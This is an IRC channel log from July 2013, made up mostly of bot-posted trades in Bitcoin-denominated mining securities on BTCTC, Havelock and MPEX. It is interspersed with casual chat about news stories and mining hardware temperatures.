[-] Jul 26 06:23:55 [BTCTC] [COGNITIVE] 1 @ 0.67 BTC [-] Jul 26 06:23:57 [BTCTC] [COGNITIVE] 3 @ 0.66 = 1.98 BTC [-] Jul 26 06:23:58 [BTCTC] [COGNITIVE] 10 @ 0.651 = 6.51 BTC [-] Jul 26 06:24:00 [BTCTC] [ACTIVEMINING] 85 @ 0.0039 = 0.3315 BTC [-] Jul 26 06:24:01 [BTCTC] [COGNITIVE] 17 @ 0.65 = 11.05 BTC [-] Jul 26 06:24:03 [BTCTC] [ACTIVEMINING] 15 @ 0.003802 = 0.057 BTC [-] Jul 26 06:24:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.04596 BTC [+] Jul 26 06:24:32 [BTCTC] [ACTIVEMINING] 100 @ 0.004 = 0.4 BTC [+] Jul 26 06:24:56 [BTCTC] [ACTIVEMINING] 50 @ 0.004 = 0.2 BTC [+] Jul 26 06:26:36 ? Jul 26 06:26:37 [BTCTC] [ACTIVEMINING] 2000 @ 0.0039 = 7.8 BTC [-] Jul 26 06:26:54 [BTCTC] [DMS.SELLING] 20 @ 0.01901 = 0.3802 BTC [-] Jul 26 06:26:56 [BTCTC] [DMS.SELLING] 10 @ 0.019 = 0.19 BTC [-] Jul 26 06:26:57 [BTCTC] [DMS.SELLING] 200 @ 0.019 = 3.8 BTC [-] Jul 26 06:27:07 [BTCTC] [ACTIVEMINING] 1 @ 0.004 BTC [+] Jul 26 06:27:27 [BTCTC] [DMS.MINING] 100 @ 0.01265 = 1.265 BTC [-] Jul 26 06:27:29 [BTCTC] [DMS.MINING] 4 @ 0.01262 = 0.0505 BTC [-] Jul 26 06:27:31 [BTCTC] [DMS.MINING] 30 @ 0.01261 = 0.3783 BTC [-] Jul 26 06:27:33 [BTCTC] [DMS.MINING] 50 @ 0.01261 = 0.6305 BTC [-] Jul 26 06:27:35 [BTCTC] [DMS.MINING] 200 @ 0.0126 = 2.52 BTC [-] Jul 26 06:27:52 [BTCTC] [ACTIVEMINING] 10 @ 0.0039 = 0.039 BTC [-] Jul 26 06:28:24 [BTCTC] [ACTIVEMINING] 118 @ 0.0039 = 0.4602 BTC [-] Jul 26 06:28:34 [HAVELOCK] [AM100] 5 @ 0.04315 = 0.2158 BTC [-] Jul 26 06:28:54 [HAVELOCK] [AM100] 10 @ 0.0431999 = 0.432 BTC [+] Jul 26 06:30:38 [HAVELOCK] [AM100] 116 @ 0.0431999 = 5.0112 BTC [+] Jul 26 06:30:56 [HAVELOCK] [AM100] 125 @ 0.0432998 = 5.4125 BTC [+] Jul 26 06:30:59 [HAVELOCK] [AM100] 44 @ 0.04329989 = 1.9052 BTC [+] Jul 26 06:31:05 [HAVELOCK] [AM100] 125 @ 0.04329989 = 5.4125 BTC [+] Jul 26 06:37:16 [BTCTC] [BMF] 4 @ 0.0399 = 0.1596 BTC [+] Jul 26 06:37:41 [BTCTC] [BMF] 1 @ 0.0399 BTC [+] Jul 26 06:41:47 what securities are you guys investing in? Jul 26 06:46:40 [HAVELOCK] [SDSTM] 2 @ 0.0098 = 0.0196 BTC [-] Jul 26 06:47:47 [BTCTC] [TAT.MINIGAME] 11 @ 0.000272 = 0.003 BTC [+] Jul 26 06:48:27 [BTCTC] [ACTIVEMINING] 50 @ 0.004 = 0.2 BTC [+] Jul 26 06:48:29 [BTCTC] [ACTIVEMINING] 636 @ 0.004 = 2.544 BTC [+] Jul 26 06:49:51 [BTCTC] [COGNITIVE] 1 @ 0.65 BTC [-] Jul 26 06:50:21 [BTCTC] [ACTIVEMINING] 34 @ 0.004 = 0.136 BTC [+] Jul 26 06:51:38 [BTCTC] [ACTIVEMINING] 16 @ 0.00399 = 0.0638 BTC [-] Jul 26 06:51:49 ;;seen mod6 Jul 26 06:51:49 mod6 was last seen in #bitcoin-assets 1 day, 20 hours, 49 minutes, and 56 seconds ago: s/poste/posts Jul 26 06:55:47 [HAVELOCK] [AM100] 8 @ 0.043292 = 0.3463 BTC [-] Jul 26 06:55:50 [BTCTC] [ACTIVEMINING] 1 @ 0.00399 BTC [-] Jul 26 07:01:25 [BTCTC] [ACTIVEMINING] 15 @ 0.00399 = 0.0599 BTC [-] Jul 26 07:05:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.04596 BTC [+] Jul 26 07:06:21 [BTCTC] [BMF] 5 @ 0.0399 = 0.1995 BTC [+] Jul 26 07:07:14 [BTCTC] [ACTIVEMINING] 750 @ 0.004 = 3 BTC [+] Jul 26 07:08:02 [BTCTC] [ACTIVEMINING] 580 @ 0.004 = 2.32 BTC [+] Jul 26 07:09:19 [HAVELOCK] [AM100] 5 @ 0.0431 = 0.2155 BTC [-] Jul 26 07:09:21 [HAVELOCK] [AM100] 72 @ 0.0431999 = 3.1104 BTC [+] Jul 26 07:10:01 [BTCTC] [ACTIVEMINING] 800 @ 0.0043 = 3.44 BTC [+] Jul 26 07:10:23 [MPEX] [S.MPOE] 9400 @ 0.00086493 = 8.1303 BTC [-] Jul 26 07:10:30 [MPEX] [S.MPOE] 850 @ 0.00086378 = 0.7342 BTC [-] Jul 26 07:11:45 [BTCTC] [ACTIVEMINING] 1 @ 0.004348 BTC [+] Jul 26 07:13:13 [HAVELOCK] [SDSTM] 3 @ 0.00989 = 0.0297 BTC [+] Jul 26 07:16:15 [BTCTC] [ACTIVEMINING] 1 @ 0.004347 BTC [-] Jul 26 07:16:46 [MPEX] [S.MPOE] 6300 @ 0.00086511 = 5.4502 BTC [+] Jul 26 07:16:51 [BTCTC] [ACTIVEMINING] 3 @ 0.004347 = 0.013 BTC [-] Jul 26 07:19:35 [BTCTC] [ACTIVEMINING] 96 @ 0.004347 = 0.4173 BTC [-] Jul 26 07:19:36 [BTCTC] [ACTIVEMINING] 100 @ 0.0044 = 0.44 BTC [+] Jul 26 07:19:37 [BTCTC] [ACTIVEMINING] 806 @ 0.004499 = 3.6262 BTC [+] Jul 26 07:20:34 [BTCTC] [TAT.MINIGAME] 3 @ 0.000273 = 0.0008 BTC [+] Jul 26 07:20:56 [BTCTC] [ACTIVEMINING] 140 @ 0.0045 = 0.63 BTC [+] Jul 26 07:22:25 [BTCTC] [ACTIVEMINING] 4 @ 0.0045 = 0.018 BTC [+] Jul 26 07:23:14 [BTCTC] [ACTIVEMINING] 256 @ 0.0045 = 1.152 BTC [+] Jul 26 07:23:36 [HAVELOCK] [AM100] 5 @ 0.0431999 = 0.216 BTC [+] Jul 26 07:25:23 whats up thestringpuller Jul 26 07:29:35 [HAVELOCK] [SMG] 15 @ 0.00025505 = 0.0038 BTC [+] Jul 26 07:29:47 [HAVELOCK] [SMG] 15 @ 0.00025501 = 0.0038 BTC [-] Jul 26 07:30:06 [HAVELOCK] [SMG] 50 @ 0.000255 = 0.0128 BTC [-] Jul 26 07:31:09 [HAVELOCK] [AM100] 29 @ 0.0432 = 1.2528 BTC [+] Jul 26 07:32:37 [HAVELOCK] [AM100] 5 @ 0.0433 = 0.2165 BTC [+] Jul 26 07:37:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.04596 = 0.2758 BTC [+] Jul 26 07:41:19 [HAVELOCK] [AM100] 2 @ 0.04339986 = 0.0868 BTC [+] Jul 26 07:41:54 [HAVELOCK] [AM100] 1 @ 0.04339986 BTC [+] Jul 26 07:43:02 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [+] Jul 26 07:43:38 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003195 = 0.0096 BTC [+] Jul 26 07:43:40 [BTCTC] [LTC-ATF.B2] 1 @ 0.01024 BTC [+] Jul 26 07:46:27 [BTCTC] [TAT.MINIGAME] 6 @ 0.000273 = 0.0016 BTC [+] Jul 26 07:47:28 [BTCTC] [TAT.MINIGAME] 1 @ 0.000275 BTC [+] Jul 26 07:54:06 [BTCTC] [ACTIVEMINING] 1 @ 0.0043 BTC [-] Jul 26 07:54:56 [BTCTC] [ACTIVEMINING] 1 @ 0.0043 BTC [-] Jul 26 07:56:03 [BTCTC] [ACTIVEMINING] 500 @ 0.0044 = 2.2 BTC [+] Jul 26 07:56:13 [BTCTC] [ACTIVEMINING] 1000 @ 0.0044 = 4.4 BTC [+] Jul 26 07:56:24 [BTCTC] [ACTIVEMINING] 20 @ 0.004489 = 0.0898 BTC [+] Jul 26 07:56:27 [BTCTC] [ACTIVEMINING] 400 @ 0.00449 = 1.796 BTC [+] Jul 26 07:56:29 [BTCTC] [ACTIVEMINING] 10 @ 0.00449 = 0.0449 BTC [+] Jul 26 07:56:34 [BTCTC] [ACTIVEMINING] 1550 @ 0.0045 = 6.975 BTC [+] Jul 26 08:00:35 [BTCTC] [ACTIVEMINING] 470 @ 0.0041 = 1.927 BTC [-] Jul 26 08:02:42 [BTCTC] [ACTIVEMINING] 17 @ 0.00449 = 0.0763 BTC [+] Jul 26 08:04:24 [BTCTC] [ACTIVEMINING] 50 @ 0.00448 = 0.224 BTC [-] Jul 26 08:06:02 [BTCTC] [ACTIVEMINING] 100 @ 0.00448 = 0.448 BTC [-] Jul 26 08:06:04 [BTCTC] [ACTIVEMINING] 19 @ 0.00449 = 0.0853 BTC [+] Jul 26 08:06:12 [HAVELOCK] [AM100] 12 @ 0.0432 = 0.5184 BTC [-] Jul 26 08:09:56 [BTCTC] [ACTIVEMINING] 4 @ 0.00448 = 0.0179 BTC [-] Jul 26 08:11:30 [BTCTC] [ACTIVEMINING] 150 @ 0.0041 = 0.615 BTC [-] Jul 26 08:15:27 [BTCTC] [TAT.MINIGAME] 1 @ 0.000275 BTC [+] Jul 26 08:16:20 [MPEX] [S.MPOE] 8900 @ 0.00086511 = 7.6995 BTC [+] Jul 26 08:16:22 [MPEX] [S.MPOE] 600 @ 0.00087 = 0.522 BTC [+] Jul 26 08:20:46 [BTCTC] [ACTIVEMINING] 5 @ 0.00445 = 0.0223 BTC [+] Jul 26 08:25:40 [BTCTC] [DMS.MINING] 1 @ 0.0133 BTC [+] Jul 26 08:26:18 [BTCTC] [BASIC-MINING] 1 @ 0.476 BTC [-] Jul 26 08:26:20 [BTCTC] [BASIC-MINING] 1 @ 0.476 BTC [-] Jul 26 08:26:21 [BTCTC] [BASIC-MINING] 3 @ 0.476 = 1.428 BTC [-] Jul 26 08:26:23 [BTCTC] [BASIC-MINING] 3 @ 0.4752 = 1.4256 BTC [-] Jul 26 08:26:24 [BTCTC] [BASIC-MINING] 1 @ 0.4751 BTC [-] Jul 26 08:26:26 [BTCTC] [BASIC-MINING] 1 @ 0.4751 BTC [-] Jul 26 08:26:38 [HAVELOCK] [AM100] 23 @ 0.04339986 = 0.9982 BTC [+] Jul 26 08:27:00 finally, some real news: http://politicalticker.blogs.cnn.com/2013/07/25/weiner-chat-partner-sydney-leathers-felt-manipulated/?hpt=hp_t1 Jul 26 08:27:57 [BTCTC] [KENILWORTH] 2 @ 0.0018 = 0.0036 BTC [-] Jul 26 08:27:58 <[\\\]> What's with all the little dick dudes being involved in the sex scandals? Jul 26 08:28:32 [BTCTC] [ACTIVEMINING] 1 @ 0.00444 BTC [-] Jul 26 08:28:48 [BTCTC] [ACTIVEMINING] 2 @ 0.00444 = 0.0089 BTC [-] Jul 26 08:29:14 what's with mistresses getting airplay Jul 26 08:29:22 [HAVELOCK] [AM100] 80 @ 0.0433 = 3.464 BTC [-] Jul 26 08:29:34 the woman looks like someone who got paid to smear Jul 26 08:30:53 [BTCTC] [ACTIVEMINING] 7 @ 0.00444 = 0.0311 BTC [-] Jul 26 08:31:11 "Otherwise he wouldn't have went on the whole 'I'm a changed man, I've learned my lesson, I wouldn't have said those things' if he wasn't trying to be someone he wasn't," she said. Jul 26 08:31:17 i bet she got $$PAYED$$ Jul 26 08:31:20 yep Jul 26 08:31:25 PAID* Jul 26 08:31:34 [BTCTC] [LTC-ATF.B2] 5 @ 0.01024 = 0.0512 BTC [+] Jul 26 08:31:43 that too :P Jul 26 08:31:47 "The exact wording was that he was an argumentative, perpetually horny middle aged man," she said. "And at the time, I was like, 'Oh no, you're not.' But yes, he is." Jul 26 08:32:43 [BTCTC] [TAT.ASICMINER] 135 @ 0.04594 = 6.2019 BTC [-] Jul 26 08:32:45 [BTCTC] [TAT.ASICMINER] 200 @ 0.04595 = 9.19 BTC [+] Jul 26 08:32:45 so they had phone sex like all the damned time, but $uddenly $he feel$ "manipulated" Jul 26 08:33:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.04597 = 0.2299 BTC [+] Jul 26 08:33:12 [BTCTC] [TAT.ASICMINER] 65 @ 0.04597 = 2.9881 BTC [+] Jul 26 08:33:16 another lol Jul 26 08:33:17 http://politicalticker.blogs.cnn.com/2013/07/26/christie-nsa-critics-should-talk-to-911-families/ Jul 26 08:33:20 Christie: NSA critics should talk to 9/11 families – CNN Political Ticker - CNN.com Blogs Jul 26 08:33:35 why does CNN even exist Jul 26 08:33:42 [BTCTC] [TAT.ASICMINER] 22 @ 0.04597 = 1.0113 BTC [+] Jul 26 08:34:29 let's see how foxnews is doing Jul 26 08:35:01 oh lawd lets not Jul 26 08:35:15 wow, it's actually like 500% more newsy than CNN Jul 26 08:42:19 [BTCTC] [ACTIVEMINING] 9 @ 0.004204 = 0.0378 BTC [-] Jul 26 08:42:21 [BTCTC] [ACTIVEMINING] 91 @ 0.004203 = 0.3825 BTC [-] Jul 26 08:48:30 http://kotaku.com/free-kanye-west-rpg-takes-the-whole-phenomenon-to-a-new-894157856 Jul 26 08:48:33 Free Kanye West RPG Takes The Whole Phenomenon To A New Level Jul 26 08:48:57 [MPEX] [S.MPOE] 4100 @ 0.00086378 = 3.5415 BTC [-] Jul 26 08:49:16 [BTCTC] [DMS.MINING] 8 @ 0.0126 = 0.1008 BTC [-] Jul 26 08:49:29 [BTCTC] [ACTIVEMINING] 14 @ 0.004203 = 0.0588 BTC [-] Jul 26 08:49:31 [BTCTC] [ACTIVEMINING] 179 @ 0.004202 = 0.7522 BTC [-] Jul 26 08:50:31 [BTCTC] [ACTIVEMINING] 39 @ 0.004202 = 0.1639 BTC [-] Jul 26 08:58:47 [BTCTC] [ACTIVEMINING] 27 @ 0.00435 = 0.1175 BTC [+] Jul 26 09:00:37 [BTCTC] [ACTIVEMINING] 5 @ 0.00435 = 0.0218 BTC [+] **** BEGIN LOGGING AT Fri Jul 26 10:15:10 2013 Jul 26 10:15:39 [BTCTC] [ACTIVEMINING] 100 @ 0.004202 = 0.4202 BTC [+] Jul 26 10:15:41 [BTCTC] [ACTIVEMINING] 500 @ 0.004201 = 2.1005 BTC [-] Jul 26 10:15:43 [BTCTC] [ACTIVEMINING] 800 @ 0.004201 = 3.3608 BTC [-] Jul 26 10:18:45 [BTCTC] [ASICMINER-PT] 5 @ 4.66 = 23.3 BTC [+] Jul 26 10:22:00 [BTCTC] [KENILWORTH] 2000 @ 0.0018 = 3.6 BTC [-] Jul 26 10:26:44 [BTCTC] [ACTIVEMINING] 9 @ 0.004287 = 0.0386 BTC [+] Jul 26 10:32:06 [BTCTC] [ACTIVEMINING] 1 @ 0.004287 BTC [+] Jul 26 10:32:08 [BTCTC] [ACTIVEMINING] 9 @ 0.004288 = 0.0386 BTC [+] Jul 26 10:33:20 [BTCTC] [ACTIVEMINING] 17 @ 0.004288 = 0.0729 BTC [+] Jul 26 10:33:41 [BTCTC] [ACTIVEMINING] 69 @ 0.004288 = 0.2959 BTC [+] Jul 26 10:33:43 [BTCTC] [ACTIVEMINING] 200 @ 0.004288 = 0.8576 BTC [+] Jul 26 10:33:45 [BTCTC] [ACTIVEMINING] 553 @ 0.004289 = 2.3718 BTC [+] Jul 26 10:33:46 [BTCTC] [ACTIVEMINING] 999 @ 0.00429 = 4.2857 BTC [+] Jul 26 10:35:00 [BTCTC] [ASICMINER-PT] 1 @ 4.643 BTC [-] Jul 26 10:35:02 [BTCTC] [ASICMINER-PT] 9 @ 4.641 = 41.769 BTC [-] Jul 26 10:36:39 [BTCTC] [ACTIVEMINING] 3 @ 0.00435 = 0.0131 BTC [+] Jul 26 10:40:25 [BTCTC] [BASIC-MINING] 1 @ 0.4754 BTC [+] Jul 26 10:40:26 [BTCTC] [BASIC-MINING] 3 @ 0.4754 = 1.4262 BTC [+] Jul 26 10:40:30 [BTCTC] [BASIC-MINING] 1 @ 0.4753 BTC [-] Jul 26 10:40:32 [BTCTC] [BASIC-MINING] 2 @ 0.4752 = 0.9504 BTC [-] Jul 26 10:40:34 [BTCTC] [BASIC-MINING] 13 @ 0.4751 = 6.1763 BTC [-] Jul 26 10:41:16 [BTCTC] [RSM] 3 @ 0.0145 = 0.0435 BTC [+] Jul 26 10:42:35 [BTCTC] [ACTIVEMINING] 2 @ 0.00435 = 0.0087 BTC [+] Jul 26 10:45:43 [BTCTC] [KENILWORTH] 250 @ 0.0018 = 0.45 BTC [-] Jul 26 10:46:32 [BTCTC] [ACTIVEMINING] 30 @ 0.00435 = 0.1305 BTC [+] Jul 26 10:47:41 [BTCTC] [ACTIVEMINING] 100 @ 0.0043 = 0.43 BTC [-] Jul 26 10:51:45 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003194 = 0.0064 BTC [-] Jul 26 10:53:29 [BTCTC] [ACTIVEMINING] 4 @ 0.0043 = 0.0172 BTC [-] Jul 26 10:54:33 [HAVELOCK] [AM100] 23 @ 0.04339987 = 0.9982 BTC [+] Jul 26 10:57:35 [BTCTC] [ACTIVEMINING] 20 @ 0.0043 = 0.086 BTC [-] Jul 26 10:59:42 [BTCTC] [ACTIVEMINING] 3055 @ 0.0043 = 13.1365 BTC [-] Jul 26 11:01:38 [BTCTC] [KENILWORTH] 40 @ 0.0018 = 0.072 BTC [-] Jul 26 11:03:06 [MPEX] [S.MPOE] 6450 @ 0.00084059 = 5.4218 BTC [-] Jul 26 11:04:40 [BTCTC] [ACTIVEMINING] 3 @ 0.0043 = 0.0129 BTC [-] Jul 26 11:10:27 [BTCTC] [ACTIVEMINING] 5 @ 0.0043 = 0.0215 BTC [-] Jul 26 11:16:45 [BTCTC] [ACTIVEMINING] 16 @ 0.0043 = 0.0688 BTC [-] Jul 26 11:18:26 [BTCTC] [ACTIVEMINING] 214 @ 0.00434 = 0.9288 BTC [+] Jul 26 11:19:37 [BTCTC] [ACTIVEMINING] 1 @ 0.004335 BTC [-] Jul 26 11:21:29 [BTCTC] [S.MPOE-PT] 2 @ 0.0008355 = 0.0017 BTC [-] Jul 26 11:23:19 [BTCTC] [ACTIVEMINING] 5 @ 0.004335 = 0.0217 BTC [-] Jul 26 11:23:28 https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash3/p480x480/164263_10151537697218157_1006625417_n.jpg Jul 26 11:24:29 that's how it's done Jul 26 11:29:00 [BTCTC] [ACTIVEMINING] 50 @ 0.004335 = 0.2168 BTC [-] Jul 26 11:29:53 [BTCTC] [TAT.ASICMINER] 52 @ 0.04598 = 2.391 BTC [+] Jul 26 11:31:22 [BTCTC] [TAT.MINIGAME] 13 @ 0.000275 = 0.0036 BTC [+] Jul 26 11:31:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.04598 BTC [+] Jul 26 11:33:01 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [+] Jul 26 11:33:43 [BTCTC] [ACTIVEMINING] 9 @ 0.004335 = 0.039 BTC [-] Jul 26 11:34:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00313 BTC [-] **** BEGIN LOGGING AT Fri Jul 26 11:53:47 2013 Jul 26 11:57:25 [BTCTC] [ACTIVEMINING] 46 @ 0.004315 = 0.1985 BTC [-] Jul 26 11:59:24 [BTCTC] [ACTIVEMINING] 50 @ 0.0043 = 0.215 BTC [-] Jul 26 12:00:03 [HAVELOCK] [SDSTM] 1 @ 0.0096 BTC [-] Jul 26 12:00:06 [HAVELOCK] [SDSTM] 6 @ 0.00921 = 0.0553 BTC [-] Jul 26 12:00:09 [HAVELOCK] [SDSTM] 6 @ 0.009201 = 0.0552 BTC [-] Jul 26 12:00:10 [HAVELOCK] [SDSTM] 100 @ 0.00920003 = 0.92 BTC [-] Jul 26 12:00:11 [HAVELOCK] [SDSTM] 274 @ 0.00920002 = 2.5208 BTC [-] Jul 26 12:00:13 [HAVELOCK] [SDSTM] 71 @ 0.00920001 = 0.6532 BTC [-] Jul 26 12:00:16 [HAVELOCK] [SDSTM] 130 @ 0.0091 = 1.183 BTC [-] Jul 26 12:00:18 [HAVELOCK] [SDSTM] 10 @ 0.0091 = 0.091 BTC [-] Jul 26 12:00:20 [HAVELOCK] [SDSTM] 2 @ 0.0091 = 0.0182 BTC [-] Jul 26 12:00:22 [HAVELOCK] [SDSTM] 60 @ 0.00900001 = 0.54 BTC [-] Jul 26 12:00:57 [HAVELOCK] [SDSTM] 14 @ 0.00900001 = 0.126 BTC [-] Jul 26 12:00:59 [HAVELOCK] [SDSTM] 3 @ 0.009 = 0.027 BTC [-] Jul 26 12:01:01 [HAVELOCK] [SDSTM] 6 @ 0.0088 = 0.0528 BTC [-] Jul 26 12:01:03 [HAVELOCK] [SDSTM] 3 @ 0.0086 = 0.0258 BTC [-] Jul 26 12:01:04 [HAVELOCK] [SDSTM] 3 @ 0.0085 = 0.0255 BTC [-] Jul 26 12:01:07 [HAVELOCK] [SDSTM] 3 @ 0.0085 = 0.0255 BTC [-] Jul 26 12:01:09 [HAVELOCK] [SDSTM] 1 @ 0.0083 BTC [-] Jul 26 12:01:11 [HAVELOCK] [SDSTM] 1 @ 0.00809 BTC [-] Jul 26 12:01:13 [HAVELOCK] [SDSTM] 6 @ 0.0079001 = 0.0474 BTC [-] Jul 26 12:01:22 [BTCTC] [ACTIVEMINING] 760 @ 0.0043 = 3.268 BTC [-] Jul 26 12:02:38 Case on: Chip Temperature: 59.2oC (as reported by BFGMiner) Ambient Temperature: 32.7oC Case Temperature: 49.4oC Noise Level: 87dB Jul 26 12:02:38 Case Off: Chip Temperature: 37.6oC (as reported by BFGMiner) Ambient Temperature: 30.9oC Case Temperature: N/A Noise Level: 36dB Jul 26 12:02:42 the wonders of bfl engineering. Jul 26 12:03:45 [BTCTC] [ACTIVEMINING] 100 @ 0.0043 = 0.43 BTC [-] Jul 26 12:08:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.04574 = 0.4574 BTC [+] Jul 26 12:19:11 [BTCTC] [TAT.ASICMINER] 8 @ 0.04572 = 0.3658 BTC [-] Jul 26 12:19:13 [BTCTC] [TAT.ASICMINER] 14 @ 0.04573 = 0.6402 BTC [+] Jul 26 12:23:25 [BTCTC] [ACTIVEMINING] 1 @ 0.0043 BTC [-] Jul 26 12:32:04 [BTCTC] [TAT.MINIGAME] 10 @ 0.000275 = 0.0028 BTC [+] Jul 26 12:34:30 [BTCTC] [ACTIVEMINING] 97 @ 0.0043 = 0.4171 BTC [-] Jul 26 12:41:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003159 BTC [+] Jul 26 12:43:22 [BTCTC] [COGNITIVE] 1 @ 0.6451 BTC [-] Jul 26 12:45:06 [BTCTC] [ACTIVEMINING] 8 @ 0.0043 = 0.0344 BTC [-] Jul 26 12:45:30 [HAVELOCK] [HIM] 10 @ 0.2 = 2 BTC [-] Jul 26 12:45:32 [HAVELOCK] [HIM] 6 @ 0.20999999 = 1.26 BTC [+] Jul 26 12:46:02 [BTCTC] [ACTIVEMINING] 100 @ 0.00425 = 0.425 BTC [-] Jul 26 12:46:04 [BTCTC] [ACTIVEMINING] 100 @ 0.004204 = 0.4204 BTC [-] Jul 26 12:46:06 [BTCTC] [ACTIVEMINING] 2 @ 0.004204 = 0.0084 BTC [-] Jul 26 12:46:08 [BTCTC] [ACTIVEMINING] 588 @ 0.004204 = 2.472 BTC [-] Jul 26 12:47:12 [BTCTC] [ACTIVEMINING] 1 @ 0.0043 BTC [+] Jul 26 12:47:26 [BTCTC] [ACTIVEMINING] 100 @ 0.004205 = 0.4205 BTC [-] Jul 26 12:47:28 [BTCTC] [ACTIVEMINING] 150 @ 0.004204 = 0.6306 BTC [-] Jul 26 12:50:25 [BTCTC] [KENILWORTH] 400 @ 0.0018 = 0.72 BTC [-] Jul 26 12:50:59 [BTCTC] [DMS.SELLING] 9 @ 0.0205 = 0.1845 BTC [+] Jul 26 12:51:08 [HAVELOCK] [AM100] 22 @ 0.04339987 = 0.9548 BTC [+] Jul 26 12:51:19 [HAVELOCK] [AM100] 92 @ 0.04339989 = 3.9928 BTC [+] Jul 26 12:52:05 [BTCTC] [ASICMINER-PT] 3 @ 4.603 = 13.809 BTC [-] Jul 26 12:54:57 [BTCTC] [ACTIVEMINING] 100 @ 0.004205 = 0.4205 BTC [+] Jul 26 12:54:59 [BTCTC] [ACTIVEMINING] 652 @ 0.004204 = 2.741 BTC [-] Jul 26 12:55:01 [BTCTC] [ACTIVEMINING] 1020 @ 0.004203 = 4.2871 BTC [-] Jul 26 12:55:03 [BTCTC] [ACTIVEMINING] 80 @ 0.004202 = 0.3362 BTC [-] Jul 26 12:55:05 [BTCTC] [ACTIVEMINING] 1000 @ 0.004201 = 4.201 BTC [-] Jul 26 12:55:06 [BTCTC] [ACTIVEMINING] 628 @ 0.0042 = 2.6376 BTC [-] Jul 26 12:55:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.04482 = 0.0896 BTC [-] Jul 26 12:55:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.04482 = 0.1793 BTC [-] Jul 26 12:55:47 [BTCTC] [TAT.ASICMINER] 91 @ 0.04465 = 4.0632 BTC [-] Jul 26 12:55:49 [BTCTC] [TAT.ASICMINER] 74 @ 0.04464 = 3.3034 BTC [-] Jul 26 12:56:57 [BTCTC] [DMS.SELLING] 1 @ 0.0205 BTC [+] Jul 26 12:58:26 [BTCTC] [BASIC-MINING] 2 @ 0.5147 = 1.0294 BTC [+] Jul 26 12:59:27 [BTCTC] [TAT.ASICMINER] 15 @ 0.04562 = 0.6843 BTC [+] Jul 26 12:59:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.04563 = 2.2815 BTC [+] Jul 26 12:59:50 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 26 13:01:02 [MPEX] [S.MPOE] 8550 @ 0.00081076 = 6.932 BTC [-] Jul 26 13:01:45 [HAVELOCK] [SDSTM] 1 @ 0.01044887 BTC [+] Jul 26 13:03:08 [BTCTC] [ACTIVEMINING] 20 @ 0.0042 = 0.084 BTC [-] Jul 26 13:03:32 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [-] Jul 26 13:08:30 [BTCTC] [ACTIVEMINING] 59 @ 0.00421 = 0.2484 BTC [+] Jul 26 13:08:32 [BTCTC] [ACTIVEMINING] 352 @ 0.0042 = 1.4784 BTC [-] Jul 26 13:08:34 [BTCTC] [ACTIVEMINING] 80 @ 0.004103 = 0.3282 BTC [-] Jul 26 13:08:35 [BTCTC] [ACTIVEMINING] 100 @ 0.004102 = 0.4102 BTC [-] Jul 26 13:08:36 [BTCTC] [ACTIVEMINING] 696 @ 0.004101 = 2.8543 BTC [-] Jul 26 13:08:37 [BTCTC] [ACTIVEMINING] 196 @ 0.0041 = 0.8036 BTC [-] Jul 26 13:11:53 [BTCTC] [ACTIVEMINING] 483 @ 0.0043 = 2.0769 BTC [+] Jul 26 13:11:55 [BTCTC] [ACTIVEMINING] 100 @ 0.0043 = 0.43 BTC [+] Jul 26 13:15:41 [BTCTC] [ACTIVEMINING] 3 @ 0.00431 = 0.0129 BTC [+] Jul 26 13:17:03 [BTCTC] [ACTIVEMINING] 6 @ 0.0043 = 0.0258 BTC [-] Jul 26 13:17:29 [BTCTC] [ACTIVEMINING] 18 @ 0.00431 = 0.0776 BTC [+] Jul 26 13:18:53 [BTCTC] [ACTIVEMINING] 7 @ 0.004314 = 0.0302 BTC [+] Jul 26 13:18:55 [HAVELOCK] [SDSTM] 2 @ 0.00831 = 0.0166 BTC [-] Jul 26 13:19:49 [BTCTC] [ACTIVEMINING] 40 @ 0.0043 = 0.172 BTC [-] Jul 26 13:19:59 [HAVELOCK] [SMG] 10 @ 0.000255 = 0.0026 BTC [-] Jul 26 13:20:34 [HAVELOCK] [SMG] 1953 @ 0.000255 = 0.498 BTC [-] Jul 26 13:22:36 [HAVELOCK] [AM100] 1 @ 0.04379 BTC [+] Jul 26 13:22:37 [MPEX] [S.MPOE] 265 @ 0.00081076 = 0.2149 BTC [-] Jul 26 13:25:09 [BTCTC] [ACTIVEMINING] 371 @ 0.0043 = 1.5953 BTC [-] Jul 26 13:26:03 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003196 = 0.0799 BTC [+] Jul 26 13:26:27 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003197 = 0.3197 BTC [+] Jul 26 13:27:22 [HAVELOCK] [SMG] 15 @ 0.00026998 = 0.004 BTC [+] Jul 26 13:28:35 [HAVELOCK] [AM100] 8 @ 0.04379 = 0.3503 BTC [+] Jul 26 13:28:46 [BTCTC] [BASIC-MINING] 1 @ 0.5148 BTC [+] Jul 26 13:28:48 [BTCTC] [BASIC-MINING] 1 @ 0.515 BTC [+] Jul 26 13:28:50 [BTCTC] [ACTIVEMINING] 73 @ 0.004314 = 0.3149 BTC [+] Jul 26 13:28:52 [BTCTC] [ACTIVEMINING] 390 @ 0.004314 = 1.6825 BTC [+] Jul 26 13:29:28 [BTCTC] [BASIC-MINING] 1 @ 0.516 BTC [+] Jul 26 13:29:28 [BTCTC] [BASIC-MINING] 1 @ 0.517 BTC [+] Jul 26 13:29:40 [BTCTC] [ACTIVEMINING] 80 @ 0.004314 = 0.3451 BTC [+] Jul 26 13:29:58 [HAVELOCK] [AM100] 3 @ 0.04379688 = 0.1314 BTC [+] Jul 26 13:30:27 [BTCTC] [LTC-ATF.B2] 100 @ 0.01023 = 1.023 BTC [-] Jul 